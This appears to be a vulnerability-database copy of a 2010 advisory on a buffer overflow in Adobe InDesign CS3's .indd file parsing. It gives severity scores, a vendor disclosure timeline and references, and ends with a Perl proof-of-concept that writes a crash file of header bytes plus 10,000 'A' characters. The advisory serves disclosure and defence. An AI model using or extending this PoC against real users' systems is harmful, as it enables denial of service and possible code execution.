Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

2010-06-0400:00:00

Gjoko Krstic

zeroscience.mk

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

7.5 High

AI Score

Confidence

High

0.227 Low

EPSS

Percentile

96.5%

JSON

Title: Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
Advisory ID: ZSL-2010-4941
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 04.06.2010

Summary

Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.

Description

When parsing .indd files to the application, it crashes instantly overwriting memory registers. Depending on the offset, EBP, EDI, EDX and ESI gets overwritten. Potential vulnerability use is arbitrary code execution and denial of service.

Vendor

Adobe Systems Incorporated - <http://www.adobe.com>

Affected Version

CS3 10.0

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.

PoC

indesign_bof.pl

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Wendy and David

References

[1] <http://www.packetstormsecurity.org/filedesc/indesign-overflow.txt.html>
[2] <http://www.securityfocus.com/bid/40565>
[3] <http://securityreason.com/exploitalert/8325>
[4] <http://secunia.com/advisories/40050/>
[5] <http://www.juniper.net/security/auto/vulnerabilities/vuln40565.html>
[6] <http://xforce.iss.net/xforce/xfdb/59132>
[7] <http://www.securelist.com/ru/advisories/40050>
[8] <http://www.securitylab.ru/poc/394521.php>
[9] <http://www.vupen.com/english/advisories/2010/1347>
[10] <http://osvdb.org/show/osvdb/65140>
[11] <http://www.vfocus.net/art/20100604/7226.html>
[12] <http://www.exploit-db.com/exploits/13817/>
[13] <http://net-security.org/vuln.php?id=12889>
[14] <https://vulners.com/cve/CVE-2010-2321>
[15] <https://nvd.nist.gov/vuln/detail/CVE-2010-2321>

Changelog

[04.06.2010] - Initial release
[05.06.2010] - Added reference [3], [4], [5], [6] and [7]
[06.06.2010] - Added reference [8], [9] and [10]
[07.06.2010] - Added reference [11]
[11.06.2010] - Added reference [12]
[14.06.2010] - Added reference [13]
[25.10.2021] - Added reference [14] and [15]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/perl
#
# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
#
# Vendor: Adobe Systems Inc.
#
# Product Web Page: http://www.adobe.com
#
# Version tested: CS3 10.0
#
# Summary: Adobe� InDesign� CS3 software provides precise control over
# typography and built-in creative tools for designing, preflighting,
# and publishing documents for print, online, or to mobile devices. Include
# interactivity, animation, video, and sound in page layouts to fully engage
# readers.
#
# Desc: When parsing .indd files to the application, it crashes instantly
# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and
# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution
# and denial of service.
#
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# 16.09.2009
#
#
#
# Vendor status:
#
# [16.09.2009] Vulnerability discovered.
# [09.03.2010] Vulnerability reported to vendor with sent PoC files.
# [21.03.2010] Asked confirmation from the vendor.
# [21.03.2010] Vendor asked for PoC files due to communication errors.
# [22.03.2010] Re-sent PoC files to vendor.
# [04.04.2010] Vendor confirms vulnerability.
# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
# [04.06.2010] Public advisory released.
#
#
# Zero Science Lab Advisory ID: ZSL-2010-4941
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php
#
#
#
# Raw PoC code:
#

$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";

$fn = "teppei.indd";

$bof = "\x41" x 10000;

print "\n\n[*] Creating PoC file: $fn ...\r\n";

sleep(1);

open(indd, "&gt;./$fn") || die "\n\aCannot open $fn : $!";

print indd "$header" . "$bof";

close (indd);

print "\n[*] PoC file successfully created!\r\n";</p></body></html>